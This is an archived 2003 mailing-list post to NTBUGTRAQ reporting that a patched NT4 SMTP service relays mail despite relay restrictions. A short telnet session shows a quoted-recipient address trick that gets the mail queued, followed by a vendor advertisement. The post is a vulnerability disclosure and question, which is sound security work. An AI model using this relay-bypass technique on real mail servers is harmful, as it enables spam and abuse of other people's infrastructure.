Can NT4 SMTP Service be misused for mail spamming

From: st0ff st0ff (if0ff_at_YAHOO.COM)
Date: 08/25/03

    Date:         Mon, 25 Aug 2003 05:38:53 -0700
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    Hi List
    I'm became aware, that it is possible to relay mails
    on a fully patched NT4 box. The SMTP service, which is
    part of the optionpack is the subject matter.

    I've installed SP6a with the SRP Q299444 and the
    newest IIS cumulative patch Q811114. The configuration
    disallow to relay mails on this server, except for the
    domain foobar.com.

    If I send an email as follows, the mail is going to be
    relayed:

    > telnet 1.1.1.1 25
    Trying 1.1.1.1...
    Connected to 1.1.1.1.
    Escape character is '^]'.
    220-foobar.com Microsoft SMTP MAIL ready at Wed, 25
    Aug 2003 10:50:27 +0200 Version: 5.5.1877.197.19 220
    ESMTP spoken here helo localhost
    250 foobar.com Hello [2.2.2.2]
    mail from: spammer@foo.com
    250 spammer@foo.com....Sender OK
    rcpt to: "victim@whatever.com"@foobar.com
    250 "victim@whatever.com"@foobar.com
    data
    354 Start mail input; end with <CRLF>.<CRLF>
    subject: spamtest
    test
    .
    250 0892a4350054683343212 Queued mail for delivery
    quit
    221 foobar.com Service closing transmission channel
    Connection closed by foreign host.

    Is that a bug, a misconfiguration or did I miss a
    patch?

    Thanks a lot

    if0ff

    http://sitebuilder.yahoo.com

    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Whatever Happened to Octopus?

    LEGATO RepliStor, formerly known as Octopus, delivers breakthrough
    replication performance that's 5X faster than the competition in an
    independent head-to-head test. Learn how RepliStor uses patented,
    asynchronous, real-time replication, to deliver disaster recovery, data
    distribution and consolidated backups. It is the first replication solution
    to achieve Windows 2003 certification. Get the performance report now.

    http://portal1.legato.com/products/replistor/upgrade.cfm

    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo